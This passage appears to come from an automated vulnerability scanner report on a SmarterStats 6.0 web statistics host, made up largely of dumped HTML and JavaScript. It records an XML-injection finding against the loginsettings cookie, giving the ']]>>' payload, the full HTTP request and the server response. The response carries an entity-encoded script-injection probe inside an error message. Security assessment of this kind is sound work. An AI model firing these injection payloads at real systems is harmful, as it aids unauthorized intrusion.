           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fSiteUsage');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dSiteUsage'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.13. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [loginsettings cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The loginsettings cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the loginsettings cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=SiteUsage HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott]]>>; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserSpiders"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:04:07 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44346



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=SiteUsage" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=M1ICYTROEq6Ql9y7PDNqrCxwQa2kits8uxrGGwbPfC-BHyJqGbMtKJgZywmD6smfBh2fWMrA8N_QYL5pca4CHQunZwujs5xpqHQQBRkMLnZ1axo0M2uf3lHNZ83m5kv_rhsD90Pm968qBTe6ctQmcba0FFtJnkHipWazocyhYiQ1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
var PageMethods = function() {
PageMethods.initializeBase(this);
this._timeout = 0;
this._userContext = null;
this._succeeded = null;
this._failed = null;
}
PageMethods.prototype = {
_get_path:function() {
var p = this.get_path();
if (p) return p;
else return PageMethods._staticInstance.get_path();},
GetReportProgress:function(guid,succeededCallback, failedCallback, userContext) {
return this._invoke(this._get_path(), 'GetReportProgress',false,{guid:guid},succeededCallback,failedCallback,userContext); }}
PageMethods.registerClass('PageMethods',Sys.Net.WebServiceProxy);
PageMethods._staticInstance = new PageMethods();
PageMethods.set_path = function(value) { PageMethods._staticInstance.set_path(value); }
PageMethods.get_path = function() { return PageMethods._staticInstance.get_path(); }
PageMethods.set_timeout = function(value) { PageMethods._staticInstance.set_timeout(value); }
PageMethods.get_timeout = function() { return PageMethods._staticInstance.get_timeout(); }
PageMethods.set_defaultUserContext = function(value) { PageMethods._staticInstance.set_defaultUserContext(value); }
PageMethods.get_defaultUserContext = function() { return PageMethods._staticInstance.get_defaultUserContext(); }
PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
